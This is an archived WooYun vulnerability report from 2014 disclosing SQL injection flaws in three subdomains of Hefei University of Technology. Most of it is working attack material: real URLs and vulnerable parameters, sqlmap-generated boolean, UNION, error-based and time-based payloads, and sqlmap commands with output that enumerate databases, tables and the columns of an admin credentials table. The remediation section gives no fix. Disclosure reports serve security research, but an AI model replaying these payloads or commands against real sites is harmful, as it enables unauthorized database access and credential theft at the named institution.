当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062908

漏洞标题:合肥工业大学某分站#Mysql Injection(1-3)

相关厂商:合肥工业大学

漏洞作者: 从容

提交时间:2014-06-05 10:41

修复时间:2014-06-10 10:41

公开时间:2014-06-10 10:41

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-05: 细节已通知厂商并且等待厂商处理中
2014-06-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

合肥工业大学某分站#Mysql Injection

详细说明:

Mysql Injection地址:
第一处:

http://cadcg.hfut.edu.cn/allurl114.php?id=201104210


---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=201104210 AND 3010=3010
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=201104210 UNION ALL SELECT NULL,NULL,CONCAT(0x7176776971,0x456c5a414a485a42786c,0x7172776571),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=201104210 AND SLEEP(5)
---


第二处:

http://qls.hfut.edu.cn/imagedetails.php?id=115


---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=115 AND 8380=8380
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=115 AND (SELECT 3165 FROM(SELECT COUNT(*),CONCAT(0x7169617871,(SELECT (CASE WHEN (3165=3165) THEN 1 ELSE 0 END)),0x7161686571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 17 columns
Payload: id=-4983 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7169617871,0x5757754e424f4c564454,0x7161686571),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=115 AND SLEEP(5)
---


第三处:

http://jpkc.hfut.edu.cn/2008/dlfx/bencandy.php?id=491


---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=491' AND (SELECT 2063 FROM(SELECT COUNT(*),CONCAT(0x71787a7871,(SELECT (CASE WHEN (2063=2063) THEN 1 ELSE 0 END)),0x7176737471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GPRn'='GPRn
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=491' AND SLEEP(5) AND 'AWzr'='AWzr
---

漏洞证明:

第一处:
#1、获取数据库:

sqlmap -u http://cadcg.hfut.edu.cn/allurl114.php?id=201104210 --dbs


available databases [2]:
[*] c231cadcg
[*] information_schema


#2、获取表段:

sqlmap -u http://cadcg.hfut.edu.cn/allurl114.php?id=201104210 -D c231cadcg --tables


Database: c231cadcg
[3 tables]
+---------+
| dynamic |
| mynews |
| xietong |
+---------+


第二处:
#1、获取数据库:

sqlmap -u http://qls.hfut.edu.cn/imagedetails.php?id=115 --dbs


available databases [2]:                                                       
[*] c257qls
[*] information_schema


#2、获取表段:

sqlmap -u http://qls.hfut.edu.cn/imagedetails.php?id=115 -D c257qls --tables


Database: c257qls                                                              
[16 tables]
+---------------+
| user |
| admin |
| article |
| index_pic |
| jgsz |
| jgxy |
| kefu |
| link |
| lwupload |
| product_types |
| qq |
| szdw_up_file |
| teacher |
| types |
| udf_temp |
| upload |
+---------------+


#3、获取字段:

sqlmap -u http://qls.hfut.edu.cn/imagedetails.php?id=115 -D c257qls -T admin --columns


Database: c257qls                                                              
Table: admin
[3 columns]
+--------+----------------------+
| Column | Type |
+--------+----------------------+
| id | int(11)\\?a0unsigned |
| name | varchar(30) |
| pwd | varchar(30) |
+--------+----------------------+


第三处:
#1、获取数据库:

sqlmap -u http://jpkc.hfut.edu.cn/2008/dlfx/bencandy.php?id=491 --dbs


available databases [2]:
[*] computer
[*] information_schema


#2、获取表段:

sqlmap -u http://jpkc.hfut.edu.cn/2008/dlfx/bencandy.php?id=491 -D computer --tables


Database: computer
[162 tables]
+---------------------+
| Admin |
| MailBox |
| admin |
| alumni |
| alumni_board |
| alumni_user |
| article |
| bbs_admin_logs |
| bbs_admin_sessions |
| bbs_badwords |
| bbs_cache_store |
| bbs_calendar_events |
| bbs_categories |
| bbs_contacts |
| bbs_css |
| bbs_email_logs |
| bbs_emoticons |
| bbs_faq |
| bbs_forum_perms |
| bbs_forum_tracker |
| bbs_forums |
| bbs_groups |
| bbs_languages |
| bbs_leagues |
| bbs_macro |
| bbs_macro_name |
| bbs_member_extra |
| bbs_members |
| bbs_messages |
| bbs_moderator_logs |
| bbs_moderators |
| bbs_pfields_content |
| bbs_pfields_data |
| bbs_polls |
| bbs_posts |
| bbs_reg_antispam |
| bbs_sale |
| bbs_search_results |
| bbs_sessions |
| bbs_skin_templates |
| bbs_skins |
| bbs_spider_logs |
| bbs_stats |
| bbs_templates |
| bbs_titles |
| bbs_tmpl_names |
| bbs_topic_mmod |
| bbs_topics |
| bbs_tracker |
| bbs_validating |
| bbs_voters |
| bbs_warn_logs |
| bookmaking |
| box |
| class |
| department |
| discourse_release |
| eduresearch |
| file |
| honor |
| ialab_achievement |
| ialab_admin |
| ialab_lecture |
| ialab_news |
| ialab_patent |
| ialab_product |
| ialab_result |
| ialab_team |
| lfj_ad |
| lfj_artic |
| lfj_artic_100 |
| lfj_artic_101 |
| lfj_artic_down |
| lfj_artic_flash |
| lfj_artic_flea |
| lfj_artic_msg |
| lfj_artic_shop |
| lfj_artic_song |
| lfj_artic_video |
| lfj_bak |
| lfj_channel |
| lfj_comment |
| lfj_config |
| lfj_credits |
| lfj_download |
| lfj_downusr |
| lfj_favorite |
| lfj_hack |
| lfj_hack_adminwork |
| lfj_keywords |
| lfj_label |
| lfj_link |
| lfj_medalinfo |
| lfj_medalusr |
| lfj_membercredit |
| lfj_memberinfo |
| lfj_members |
| lfj_mgroup |
| lfj_mgroup_sort |
| lfj_msg |
| lfj_msgfriend |
| lfj_online |
| lfj_order |
| lfj_poll |
| lfj_reply |
| lfj_setmemberinfo |
| lfj_sort |
| lfj_sortmsg |
| lfj_stat |
| lfj_top |
| lfj_vote |
| mailadmin |
| map |
| message |
| news |
| news_adminlog |
| news_article |
| news_articlerate |
| news_articletext |
| news_cache |
| news_comment |
| news_favorite |
| news_gallery |
| news_loginlog |
| news_manager |
| news_message |
| news_news |
| news_relatedlink |
| news_replacement |
| news_replacementset |
| news_session |
| news_setting |
| news_settinggroup |
| news_sort |
| news_style |
| news_template |
| news_templateset |
| news_user |
| news_useractivation |
| news_usergroup |
| newsclasssub |
| power |
| scienceresearch |
| soc_labInfo |
| soc_labShortInfo |
| soc_members |
| soc_news_pic |
| soc_news_text |
| soc_papers |
| soc_project |
| soc_research |
| soc_resource |
| soc_seminar |
| soc_student |
| soc_teacher |
| soc_teaching |
| soc_user |
| specialty_class |
| specialty_detail |
| staffroom |
| teacher_class |
| teacher_detail |
+---------------------+

修复方案:

有礼物么?
:)

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-10 10:41

厂商回复:

最新状态:

暂无


漏洞评价:

评论